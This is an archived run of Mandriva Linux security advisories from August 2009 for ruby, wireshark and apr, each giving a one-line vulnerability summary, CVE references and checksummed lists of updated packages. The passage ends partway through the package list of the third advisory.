Aug 6 00:10:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 06 Aug 2009 01:10:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:193 ] ruby Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:193 http://www.mandriva.com/security/ _______________________________________________________________________ Package : ruby Date : August 5, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: ext/openssl/ossl_ocsp.c in Ruby 1.8 and 1.9 does not properly check the return value from the OCSP_basic_verify function, which might allow remote attackers to successfully present an invalid X.509 certificate, possibly involving a revoked certificate. This update corrects the problem, including for older ruby versions. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0642 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: b6713b937acd6177e43d5dd9adf78a92 2008.1/i586/ruby-1.8.6-9p114.4mdv2008.1.i586.rpm 09481407505f55b81cade1db95d738c6 2008.1/i586/ruby-devel-1.8.6-9p114.4mdv2008.1.i586.rpm 0308ccc0cb62ca9031c654c94cc0e9ee 2008.1/i586/ruby-doc-1.8.6-9p114.4mdv2008.1.i586.rpm a1f5fffec41efe72ce8976c8ef79a660 2008.1/i586/ruby-tk-1.8.6-9p114.4mdv2008.1.i586.rpm 4bbb4018722168d2ced70b7c107c6ea0 2008.1/SRPMS/ruby-1.8.6-9p114.4mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 6128ad00fe61fe921239487a3a7f9c2a 2008.1/x86_64/ruby-1.8.6-9p114.4mdv2008.1.x86_64.rpm a37e6862e77d34a6b8a511bdfb2a6d24 2008.1/x86_64/ruby-devel-1.8.6-9p114.4mdv2008.1.x86_64.rpm d47b51ac7bd9ce7233e607f1d3d1edc3 2008.1/x86_64/ruby-doc-1.8.6-9p114.4mdv2008.1.x86_64.rpm 6b8503f890db07a56a602e5004dcde76 2008.1/x86_64/ruby-tk-1.8.6-9p114.4mdv2008.1.x86_64.rpm 4bbb4018722168d2ced70b7c107c6ea0 2008.1/SRPMS/ruby-1.8.6-9p114.4mdv2008.1.src.rpm Mandriva Linux 2009.0: a99dca894009b3416c947c9b918ca565 2009.0/i586/ruby-1.8.7-7p72.2mdv2009.0.i586.rpm ffdba0c2d07588a9d03e8b35b2bfdc62 2009.0/i586/ruby-devel-1.8.7-7p72.2mdv2009.0.i586.rpm a87ad8e2b9aa8a12e0d263a51d392abf 2009.0/i586/ruby-doc-1.8.7-7p72.2mdv2009.0.i586.rpm 8603163c55d43873154a15f412cf9dc6 2009.0/i586/ruby-tk-1.8.7-7p72.2mdv2009.0.i586.rpm 643988677dc99d19e0f70907745edb64 2009.0/SRPMS/ruby-1.8.7-7p72.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 07840368d916f0d15f9c00e135f7c307 2009.0/x86_64/ruby-1.8.7-7p72.2mdv2009.0.x86_64.rpm b7e8a14de19e4898e3ee6396f6c2d073 2009.0/x86_64/ruby-devel-1.8.7-7p72.2mdv2009.0.x86_64.rpm ab0cf8b25ac28347827a8c09f1f0a6eb 2009.0/x86_64/ruby-doc-1.8.7-7p72.2mdv2009.0.x86_64.rpm 539aecfa8e5cfc78b25551b64144ae44 2009.0/x86_64/ruby-tk-1.8.7-7p72.2mdv2009.0.x86_64.rpm 643988677dc99d19e0f70907745edb64 2009.0/SRPMS/ruby-1.8.7-7p72.2mdv2009.0.src.rpm Mandriva Linux 2009.1: 8c79d647f56c69f4092db555f76f2fc0 2009.1/i586/ruby-1.8.7-9p72.2mdv2009.1.i586.rpm 1de68e2e5913980856e94bb48776ccf6 2009.1/i586/ruby-devel-1.8.7-9p72.2mdv2009.1.i586.rpm 2e25f7bee81951aa32c3cb22c235295e 2009.1/i586/ruby-doc-1.8.7-9p72.2mdv2009.1.i586.rpm 87808e106da38245199b7fe1ce2df0a0 2009.1/i586/ruby-tk-1.8.7-9p72.2mdv2009.1.i586.rpm a2d2afc50337c9e59faf07560d524acf 2009.1/SRPMS/ruby-1.8.7-9p72.2mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 9fa5300ab40245ffb8a9324b6a508dd1 2009.1/x86_64/ruby-1.8.7-9p72.2mdv2009.1.x86_64.rpm e3d66178e2688a3ffa2474f51f06fdb0 2009.1/x86_64/ruby-devel-1.8.7-9p72.2mdv2009.1.x86_64.rpm f67eb8be42e770f0cab2bc27011cb914 2009.1/x86_64/ruby-doc-1.8.7-9p72.2mdv2009.1.x86_64.rpm daa9e7bdcef05e5184d7330f404aabe6 2009.1/x86_64/ruby-tk-1.8.7-9p72.2mdv2009.1.x86_64.rpm a2d2afc50337c9e59faf07560d524acf 2009.1/SRPMS/ruby-1.8.7-9p72.2mdv2009.1.src.rpm Corporate 3.0: bb6f25ad3053954c969ff74fca117518 corporate/3.0/i586/ruby-1.8.1-1.13.C30mdk.i586.rpm ad4055c50ce8da0372d831e0b488af9c corporate/3.0/i586/ruby-devel-1.8.1-1.13.C30mdk.i586.rpm 13448c01625ca8b1b538aa5162d2c620 corporate/3.0/i586/ruby-doc-1.8.1-1.13.C30mdk.i586.rpm 78451cec2892c715ace6ce09b75a4f07 corporate/3.0/i586/ruby-tk-1.8.1-1.13.C30mdk.i586.rpm a235fb7168b3c327d4d6ae80290bdd6e corporate/3.0/SRPMS/ruby-1.8.1-1.13.C30mdk.src.rpm Corporate 3.0/X86_64: 5d315613d9f992d6c4f58c52bd03d627 corporate/3.0/x86_64/ruby-1.8.1-1.13.C30mdk.x86_64.rpm d3b693c92ee4968e6f6d63e3b71e5a90 corporate/3.0/x86_64/ruby-devel-1.8.1-1.13.C30mdk.x86_64.rpm 7f0ca0f79a7b9286cd98e2da2ba6c2b4 corporate/3.0/x86_64/ruby-doc-1.8.1-1.13.C30mdk.x86_64.rpm 9f4cc39abd6d039223c80dfcc101e51f corporate/3.0/x86_64/ruby-tk-1.8.1-1.13.C30mdk.x86_64.rpm a235fb7168b3c327d4d6ae80290bdd6e corporate/3.0/SRPMS/ruby-1.8.1-1.13.C30mdk.src.rpm Corporate 4.0: 14eefde3ea5f870005dd4c0fb2025c8c corporate/4.0/i586/ruby-1.8.2-7.10.20060mlcs4.i586.rpm e4b685717a138c661ca4f13ee4c00c12 corporate/4.0/i586/ruby-devel-1.8.2-7.10.20060mlcs4.i586.rpm e63feea2d4bd7b87be16335da05142a9 corporate/4.0/i586/ruby-doc-1.8.2-7.10.20060mlcs4.i586.rpm ccbefcfcf5c49233f2573ca89a60c687 corporate/4.0/i586/ruby-tk-1.8.2-7.10.20060mlcs4.i586.rpm 66356780c7aacc6ad849f4c87898de31 corporate/4.0/SRPMS/ruby-1.8.2-7.10.20060mlcs4.src.rpm Corporate 4.0/X86_64: ac7b9ff49f03f98310cdce61ca88d87f corporate/4.0/x86_64/ruby-1.8.2-7.10.20060mlcs4.x86_64.rpm 488c64e56c4b7c9cf1336c98436d492f corporate/4.0/x86_64/ruby-devel-1.8.2-7.10.20060mlcs4.x86_64.rpm f487ec8a14a4b0690ae8f3337fc518cc corporate/4.0/x86_64/ruby-doc-1.8.2-7.10.20060mlcs4.x86_64.rpm a5a8f90e1fbfd7dc680c9cd8827857c7 corporate/4.0/x86_64/ruby-tk-1.8.2-7.10.20060mlcs4.x86_64.rpm 66356780c7aacc6ad849f4c87898de31 corporate/4.0/SRPMS/ruby-1.8.2-7.10.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 89918bfc80df73ecbd918b78facac289 mes5/i586/ruby-1.8.7-7p72.2mdvmes5.i586.rpm 342607d25b5573fb4e3193e3d74978df mes5/i586/ruby-devel-1.8.7-7p72.2mdvmes5.i586.rpm 49796832a7df2a8f26381bb6ff2525a0 mes5/i586/ruby-doc-1.8.7-7p72.2mdvmes5.i586.rpm 54307ad3d0a7278bc520dad9e6861f86 mes5/i586/ruby-tk-1.8.7-7p72.2mdvmes5.i586.rpm c53fadcd8cef5e5b80a4c85d8538a8a5 mes5/SRPMS/ruby-1.8.7-7p72.2mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 910d0b5fa5766311f5c5dd067f8faeef mes5/x86_64/ruby-1.8.7-7p72.2mdvmes5.x86_64.rpm c970d0fed769ad331bfca522b7e5419f mes5/x86_64/ruby-devel-1.8.7-7p72.2mdvmes5.x86_64.rpm 5e5ec905b65a9e9635ef3d97d9783aa4 mes5/x86_64/ruby-doc-1.8.7-7p72.2mdvmes5.x86_64.rpm 8d60e7dd804cf09d17d6e8a6360b01f1 mes5/x86_64/ruby-tk-1.8.7-7p72.2mdvmes5.x86_64.rpm c53fadcd8cef5e5b80a4c85d8538a8a5 mes5/SRPMS/ruby-1.8.7-7p72.2mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKeeMjmqjQ0CJFipgRAjpNAJ9QEqQ8BQQw94EJCb8w+GKuPulhTwCdF4dc AKqRkdKUelkudpzxgkwoMLo= =YKb2 -----END PGP SIGNATURE----- From security at mandriva.com Thu Aug 6 04:17:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 06 Aug 2009 05:17:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:194 ] wireshark Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:194 http://www.mandriva.com/security/ _______________________________________________________________________ Package : wireshark Date : August 5, 2009 Affected: 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: Vulnerabilities have been discovered in wireshark package, which could lead to application crash via radius, infiniband and afs dissectors (CVE-2009-2560, CVE-2009-2562, CVE-2009-2563). This update provides a fix for those vulnerabilities. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2560 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2562 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2563 http://www.wireshark.org/security/wnpa-sec-2009-04.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: 35c44b3dda2222f03f0229dffe083690 2009.0/i586/dumpcap-1.0.8-3.2mdv2009.0.i586.rpm 32a5a19dbd7d927f04462644fda1a918 2009.0/i586/libwireshark0-1.0.8-3.2mdv2009.0.i586.rpm 679abf03eebc9c9790497845a49b92b5 2009.0/i586/libwireshark-devel-1.0.8-3.2mdv2009.0.i586.rpm 7fc204402d3ca6c0b89b5aefc58ac243 2009.0/i586/rawshark-1.0.8-3.2mdv2009.0.i586.rpm fc2ceb7dcbd8edaac22fac8ef8020688 2009.0/i586/tshark-1.0.8-3.2mdv2009.0.i586.rpm 5e42c96a3f433b845059cc4616b3f1bf 2009.0/i586/wireshark-1.0.8-3.2mdv2009.0.i586.rpm 3c70080e2d6962af6cf0c7d48fec8a89 2009.0/i586/wireshark-tools-1.0.8-3.2mdv2009.0.i586.rpm 10dc6eb791beb4db15d7dd9acd20a3b5 2009.0/SRPMS/wireshark-1.0.8-3.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 0b42122bf6b1a5c3e65b673b19da382e 2009.0/x86_64/dumpcap-1.0.8-3.2mdv2009.0.x86_64.rpm f560c78cf476d2c4bc4758330a933fff 2009.0/x86_64/lib64wireshark0-1.0.8-3.2mdv2009.0.x86_64.rpm 3a9a289b9e01b4ce1d89b970b3577a56 2009.0/x86_64/lib64wireshark-devel-1.0.8-3.2mdv2009.0.x86_64.rpm 759831cb22ec8a5d5028015a35931087 2009.0/x86_64/rawshark-1.0.8-3.2mdv2009.0.x86_64.rpm e12270bc4129f1c62a6fccba67e80fe0 2009.0/x86_64/tshark-1.0.8-3.2mdv2009.0.x86_64.rpm de928a404ae250eabb93ea05c5e022d4 2009.0/x86_64/wireshark-1.0.8-3.2mdv2009.0.x86_64.rpm 05b5ac1f460a049efc36b57785c9d166 2009.0/x86_64/wireshark-tools-1.0.8-3.2mdv2009.0.x86_64.rpm 10dc6eb791beb4db15d7dd9acd20a3b5 2009.0/SRPMS/wireshark-1.0.8-3.2mdv2009.0.src.rpm Mandriva Linux 2009.1: 5f084d3f4d56462afdeb056d2c63e0b0 2009.1/i586/dumpcap-1.0.8-3.2mdv2009.1.i586.rpm e9137ca3ecf24656a06ae4dd0870137d 2009.1/i586/libwireshark0-1.0.8-3.2mdv2009.1.i586.rpm 31e8564ff9ad9a1a4085a23df535a9b7 2009.1/i586/libwireshark-devel-1.0.8-3.2mdv2009.1.i586.rpm d125bcd35a05532acd2bce81bb477278 2009.1/i586/rawshark-1.0.8-3.2mdv2009.1.i586.rpm cd24c453d85fa38cdb95f798af11ada1 2009.1/i586/tshark-1.0.8-3.2mdv2009.1.i586.rpm 3853e1197a5f1189ccecace02c664cd9 2009.1/i586/wireshark-1.0.8-3.2mdv2009.1.i586.rpm cd28e512238504a40183ac9053f7ded7 2009.1/i586/wireshark-tools-1.0.8-3.2mdv2009.1.i586.rpm 7772b718900f37402f2205df81027eaf 2009.1/SRPMS/wireshark-1.0.8-3.2mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 33fb00d1fe8705f96b68a557df9dc82c 2009.1/x86_64/dumpcap-1.0.8-3.2mdv2009.1.x86_64.rpm fecf1fea37ba80db55b081dada88d92e 2009.1/x86_64/lib64wireshark0-1.0.8-3.2mdv2009.1.x86_64.rpm 997814600900d1897d36ec703931107f 2009.1/x86_64/lib64wireshark-devel-1.0.8-3.2mdv2009.1.x86_64.rpm bb03b7ab486159ff2185f28298817ec3 2009.1/x86_64/rawshark-1.0.8-3.2mdv2009.1.x86_64.rpm ddd6af566dd048d7660e6c51407951f5 2009.1/x86_64/tshark-1.0.8-3.2mdv2009.1.x86_64.rpm e380009d79ccf87bcd6dc614af0fcf3a 2009.1/x86_64/wireshark-1.0.8-3.2mdv2009.1.x86_64.rpm 416b62662ecb8f00c9b38b67c8bffe68 2009.1/x86_64/wireshark-tools-1.0.8-3.2mdv2009.1.x86_64.rpm 7772b718900f37402f2205df81027eaf 2009.1/SRPMS/wireshark-1.0.8-3.2mdv2009.1.src.rpm Corporate 4.0: 0edce2e85d953b8ad86d663054e8d556 corporate/4.0/i586/dumpcap-1.0.8-0.2.20060mlcs4.i586.rpm b3b5ff7686d44df6d741213ca4ef5a3f corporate/4.0/i586/libwireshark0-1.0.8-0.2.20060mlcs4.i586.rpm 15af42501657bf3b632faf78ac64b676 corporate/4.0/i586/libwireshark-devel-1.0.8-0.2.20060mlcs4.i586.rpm df9b9c9d6844d09407255585e95363eb corporate/4.0/i586/rawshark-1.0.8-0.2.20060mlcs4.i586.rpm 1e0524ed826663d6c123a25a810229c4 corporate/4.0/i586/tshark-1.0.8-0.2.20060mlcs4.i586.rpm 70284837b799f074252a92e36003fa7b corporate/4.0/i586/wireshark-1.0.8-0.2.20060mlcs4.i586.rpm 7770f8370818ed3051849804c5c7832b corporate/4.0/i586/wireshark-tools-1.0.8-0.2.20060mlcs4.i586.rpm 58357c66e0af1174591ddede8552e9ed corporate/4.0/SRPMS/wireshark-1.0.8-0.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 9e324be1a76546158eef6d1afec6b477 corporate/4.0/x86_64/dumpcap-1.0.8-0.2.20060mlcs4.x86_64.rpm cd0b9333f156d892f7783a6c94ba03e2 corporate/4.0/x86_64/lib64wireshark0-1.0.8-0.2.20060mlcs4.x86_64.rpm c0619181ce70e9f9c4e684fa3c949a2b corporate/4.0/x86_64/lib64wireshark-devel-1.0.8-0.2.20060mlcs4.x86_64.rpm 5711b26fec21ca6e9198778e5dcf3beb corporate/4.0/x86_64/rawshark-1.0.8-0.2.20060mlcs4.x86_64.rpm 36c9aee8682d690f83712f12504185c7 corporate/4.0/x86_64/tshark-1.0.8-0.2.20060mlcs4.x86_64.rpm eb7bd5e8bcc27a6840f055612073d39a corporate/4.0/x86_64/wireshark-1.0.8-0.2.20060mlcs4.x86_64.rpm b2a448f16e99cf72889bd1179cd91a67 corporate/4.0/x86_64/wireshark-tools-1.0.8-0.2.20060mlcs4.x86_64.rpm 58357c66e0af1174591ddede8552e9ed corporate/4.0/SRPMS/wireshark-1.0.8-0.2.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 46b3b6e24434f0219bcbd710ce979563 mes5/i586/dumpcap-1.0.8-3.2mdvmes5.i586.rpm f6c0d02d8d2369f54adb817f81d248ba mes5/i586/libwireshark0-1.0.8-3.2mdvmes5.i586.rpm 300514c2f3909498b5ef551f4df390c0 mes5/i586/libwireshark-devel-1.0.8-3.2mdvmes5.i586.rpm 2570e35d68c35e716b837ad5cca06cda mes5/i586/rawshark-1.0.8-3.2mdvmes5.i586.rpm 6921ab12a7d1181937acc6dfbd58d8bb mes5/i586/tshark-1.0.8-3.2mdvmes5.i586.rpm 445d9741305071b62274166e1499979e mes5/i586/wireshark-1.0.8-3.2mdvmes5.i586.rpm fcc036a683833e62c01a03c8f7719e99 mes5/i586/wireshark-tools-1.0.8-3.2mdvmes5.i586.rpm 9764beb45431d60f5f42cd1dd75e0552 mes5/SRPMS/wireshark-1.0.8-3.2mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 17665ab83f9cb30c85ed773c45641028 mes5/x86_64/dumpcap-1.0.8-3.2mdvmes5.x86_64.rpm 02c24673bfe6734d2c24f8212d902065 mes5/x86_64/lib64wireshark0-1.0.8-3.2mdvmes5.x86_64.rpm 8c15123fc16dd8adce1fb0cd91003363 mes5/x86_64/lib64wireshark-devel-1.0.8-3.2mdvmes5.x86_64.rpm 22d064d32c5896e077e2134add0cac5d mes5/x86_64/rawshark-1.0.8-3.2mdvmes5.x86_64.rpm 218afbc803e79a6e21b456a8b9f6600e mes5/x86_64/tshark-1.0.8-3.2mdvmes5.x86_64.rpm 905aa32b8e1f3cd7322c0bc4f5c104e1 mes5/x86_64/wireshark-1.0.8-3.2mdvmes5.x86_64.rpm 6a0a6053cc654a3342cf564486b31d46 mes5/x86_64/wireshark-tools-1.0.8-3.2mdvmes5.x86_64.rpm 9764beb45431d60f5f42cd1dd75e0552 mes5/SRPMS/wireshark-1.0.8-3.2mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKeh6wmqjQ0CJFipgRAsn1AJ9913NYSPZhCVnYbSk4sMH+hyuoqgCfanCl pnfGj9IIxOR7U5+b1pp5z18= =fgJz -----END PGP SIGNATURE----- From security at mandriva.com Thu Aug 6 15:55:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 06 Aug 2009 16:55:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:195 ] apr Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:195 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apr Date : August 6, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Enterprise Server 5.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: A vulnerability has been identified and corrected in apr and apr-util: Fix potential overflow in pools (apr) and rmm (apr-util), where size alignment was taking place (CVE-2009-2412). This update provides fixes for these vulnerabilities. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: bd5757bce0a8299edcf7dcc3e2980964 2008.1/i586/apr-util-dbd-mysql-1.2.12-4.2mdv2008.1.i586.rpm 50ba5cc45e1f72e8219addc0df369ca4 2008.1/i586/apr-util-dbd-pgsql-1.2.12-4.2mdv2008.1.i586.rpm 1cb0f643e4084741afefb8d25d975062 2008.1/i586/apr-util-dbd-sqlite3-1.2.12-4.2mdv2008.1.i586.rpm 23990e6d23f02addecd2d3dcd7d68baf 2008.1/i586/libapr1-1.2.12-3.1mdv2008.1.i586.rpm 002cebd9b1e101cc487490fb5e1de4b9 2008.1/i586/libapr-devel-1.2.12-3.1mdv2008.1.i586.rpm 178584e4fee60428188b4f8be39e8b22 2008.1/i586/libapr-util1-1.2.12-4.2mdv2008.1.i586.rpm d718e18960ee01edbfc9cf99cb335604 2008.1/i586/libapr-util-devel-1.2.12-4.2mdv2008.1.i586.rpm bf792d204211369b8c63051f1360fd97 2008.1/SRPMS/apr-1.2.12-3.1mdv2008.1.src.rpm dcbd01ea287e6d8efc276dfa074c3930 2008.1/SRPMS/apr-util-1.2.12-4.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 6a9a81c520c8e30b5f8fbbe54d185dff 2008.1/x86_64/apr-util-dbd-mysql-1.2.12-4.2mdv2008.1.x86_64.rpm cc9d7917d41f5ca317d2942c2d14c859 2008.1/x86_64/apr-util-dbd-pgsql-1.2.12-4.2mdv2008.1.x86_64.rpm 016e48025c0fec50db868ba23d20140e 2008.1/x86_64/apr-util-dbd-sqlite3-1.2.12-4.2mdv2008.1.x86_64.rpm 6ee3859a30eab3399275b29356df5727 2008.1/x86_64/lib64apr1-1.2.12-3.1mdv2008.1.x86_64.rpm 766f74618ab9532eef5ab40f94112579 2008.1/x86_64/lib64apr-devel-1.2.12-3.1mdv2008.1.x86_64.rpm 6e57aa1381b9af730eec5f313f8d5d79 2008.1/x86_64/lib64apr-util1-1.2.12-4.2mdv2008.1.x86_64.rpm 6fda7ebf5640ad5ad9ba0d2d1169dbc9 2008.1/x86_64/lib64apr-util-devel-1.2.12-4.2mdv2008.1.x86_64.rpm bf792d204211369b8c63051f1360fd97 2008.1/SRPMS/apr-1.2.12-3.1mdv2008.1.src.rpm dcbd01ea287e6d8efc276dfa074c3930 2008.1/SRPMS/apr-util-1.2.12-4.2mdv2008.1.src.rpm Mandriva Linux 2009.0: 89786c5904cee8d22c5140528d412a1c 2009.0/i586/apr-util-dbd-freetds-1.3.4-2.2mdv2009.0.i586.rpm 19df90719d15def384b7aec1efc5dcd8 2009.0/i586/apr-util-dbd-ldap-1.3.4-2.2mdv2009.0.i586.rpm e164acf4668fd239f2801698e3dc9aa4 2009.0/i586/apr-util-dbd-mysql-1.3.4-2.2mdv2009.0.i586.rpm 70f55ca514ef15778001082f3c51a9fd 2009.0/i586/apr-util-dbd-odbc-1.3.4-2.2mdv2009.0.i586.rpm 85135d9490be22fc56a897cf9d5fba7e 2009.0/i586/apr-util-dbd-pgsql-1.3.4-2.2mdv2009.0.i586.rpm 424d3a8896bc70503a69dc8c4d9882a9 2009.0/i586/apr-util-dbd-sqlite3-1.3.4-2.2mdv2009.0.i586.rpm 586edd704499f119527638f0f1913614 2009.0/i586/libapr1-1.3.3-2.1mdv2009.0.i586.rpm f5065323fca63075434ce1eb850e3c01 2009.0/i586/libapr-devel-1.3.3-2.1mdv2009.0.i586.rpm 4aba7262b561a1d67187c799cd06a138 2009.0/i586/libapr-util1-1.3.4-2.2mdv2009.0.i586.rpm a125fa8529bd8dd79ada83747c23f9d4 2009.0/i586/libapr-util-devel-1.3.4-2.2mdv2009.0.i586.rpm 23e454eea7e368502047b85976d1ef88 2009.0/SRPMS/apr-1.3.3-2.1mdv2009.0.src.rpm 162271ed051fa5de81a973e5adc487dc 2009.0/SRPMS/apr-util-1.3.4-2.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 667ffab851dd6babd31700a5d9c113a7 2009.0/x86_64/apr-util-dbd-freetds-1.3.4-2.2mdv2009.0.x86_64.rpm 08089224bb9da997752624d85c229251 2009.0/x86_64/apr-util-dbd-ldap-1.3.4-2.2mdv2009.0.x86_64.rpm 7ce1a16bc3e35fc4a3dcb8a1e148c05b 2009.0/x86_64/apr-util-dbd-mysql-1.3.4-2.2mdv2009.0.x86_64.rpm 075dbc136d3110952d54f9a85761c1b6 2009.0/x86_64/apr-util-dbd-odbc-1.3.4-2.2mdv2009.0.x86_64.rpm 90edf3ec758ed79a7973a36141ddc295 2009.0/x86_64/apr-util-dbd-pgsql-1.3.4-2.2mdv2009.0.x86_64.rpm f15ee7ff2b203c436eab2d7e4c118a1d 2009.0/x86_64/apr-util-dbd-sqlite3-1.3.4-2.2mdv2009.0.x86_64.rpm 2b0529a353e38a0eda5f8d08ecf95554 2009.0/x86_64/lib64apr1-1.3.3-2.1mdv2009.0.x86_64.rpm 524773745dfeb06cd86e7149723c6cbe 2009.0/x86_64/lib64apr-devel-1.3.3-2.1mdv2009.0.x86_64.rpm 3e7bc1d3e713ba5893c34215ee93f932 2009.0/x86_64/lib64apr-util1-1.3.4-2.2mdv2009.0.x86_64.rpm 44be6021b3db277a5993f488b02074db 2009.0/x86_64/lib64apr-util-devel-1.3.4-2.2mdv2009.0.x86_64.rpm 23e454eea7e368502047b85976d1ef88 2009.0/SRPMS/apr-1.3.3-2.1mdv2009.0.src.rpm 162271ed051fa5de81a973e5adc487dc 2009.0/SRPMS/apr-util-1.3.4-2.2mdv2009.0.src.rpm Mandriva Linux 2009.1: 0b3427fcb40fcd8e068eb81e8de67685 2009.1/i586/apr-util-dbd-freetds-1.3.4-9.2mdv2009.1.i586.rpm 77e215797fc02c290e59ce072a36fffc 2009.1/i586/apr-util-dbd-ldap-1.3.4-9.2mdv2009.1.i586.rpm 05d1106df36459a7a40ecb11d5560c61 2009.1/i586/apr-util-dbd-mysql-1.3.4-9.2mdv2009.1.i586.rpm 97adcfda40750873588942a9ab0e5e3c 2009.1/i586/apr-util-dbd-odbc-1.3.4-9.2mdv2009.1.i586.rpm 1b9379f8d6ec49908d43d4228ecbee66 2009.1/i586/apr-util-dbd-pgsql-1.3.4-9.2mdv2009.1.i586.rpm a5e5bb25d2e370e22f274482afe74fd8 2009.1/i586/apr-util-dbd-sqlite3-1.3.4-9.2mdv2009.1.i586.rpm 1f907eab0d93dd413086f0943988284c 2009.1/i586/libapr1-1.3.3-5.1mdv2009.1.i586.rpm a6992c671c7352c2965f46abced93b8a 2009.1/i586/libapr-devel-1.3.3-5.1mdv2009.1.i586.rpm e748ca10352eaa46ef2514ce8718674b 2009.1/i586/libapr-util1-1.3.4-9.2mdv2009.1.i586.rpm 73afb8eabe81ae8be63f1ba9d8fc3bf2 2009.1/i586/libapr-util-devel-1.3.4-9.2mdv2009.1.i586.rpm 1a1706c01c2668a058a54c06d6e5aac6 2009.1/SRPMS/apr-1.3.3-5.1mdv2009.1.src.rpm 241d8b7b1261089d299f9b8463f391a7 2009.1/SRPMS/apr-util-1.3.4-9.2mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: f0b10ee44c9092605ad1137a46e4955c 2009.1/x86_64/apr-util-dbd-freetds-1.3.4-9.2mdv2009.1.x86_64.rpm 98247a74314a56b6f4097a9943e236c0 2009.1/x86_64/apr-util-dbd-ldap-1.3.4-9.2mdv2009.1.x86_64.rpm 2e0d895eb1b93c2518436ab4c678da23 2009.1/x86_64/apr-util-dbd-mysql-1.3.4-9.2mdv2009.1.x86_64.rpm 8269586d2608f6e79eff11de7bda333e 2009.1/x86_64/apr-util-dbd-odbc-1.3.4-9.2mdv2009.1.x86_64.rpm 489b31861a5fabd272348ca224e4d9b4 2009.1/x86_64/apr-util-dbd-pgsql-1.3.4-9.2mdv2009.1.x86_64.rpm b1164ff6f2e06bfcada083e9d11c1595 2009.1/x86_64/apr-util-dbd-sqlite3-1.3.4-9.2mdv2009.1.x86_64.rpm 257e2b240479fb7c472efa7de7ee11c8 2009.1/x86_64/lib64apr1-1.3.3-5.1mdv2009.1.x86_64.rpm 222f5f44d9600dcf593923ea6422d47e 2009.1/x86_64/lib64apr-devel-1.3.3-5.1mdv2009.1.x86_64.rpm 99ef537b486eccad55d8f0d79f37abbd 2009.1/x86_64/lib64apr-util1-1.3.4-9.2mdv2009.1.x86_64.rpm 9d9e0933f57289530059e5a9b3e42e1c 2009.1/x86_64/lib64apr-util-devel-1.3.4-9.2mdv2009.1.x86_64.rpm 1a1706c01c2668a058a54c06d6e5aac6 2009.1/SRPMS/apr-1.3.3-5.1mdv2009.1.src.rpm 241d8b7b1261089d299f9b8463f391a7 2009.1/SRPMS/apr-util-1.3.4-9.2mdv2009.1.src.rpm Corporate 3.0: 39d0747e39f45148c8540e76a272f219 corporate/3.0/i586/apache2-2.0.48-6.22.C30mdk.i586.rpm 9c7677568ec7e3fab84ed224af029d6a corporate/3.0/i586/apache2-common-2.0.48-6.22.C30mdk.i586.rpm 9f60f68aa326aaaa02cb6e9346ac0b7b corporate/3.0/i586/apache2-devel-2.0.48-6.22.C30mdk.i586.rpm a9051117cf2a34ed7cf9066e31d1767f corporate/3.0/i586/apache2-manual-2.0.48-6.22.C30mdk.i586.rpm 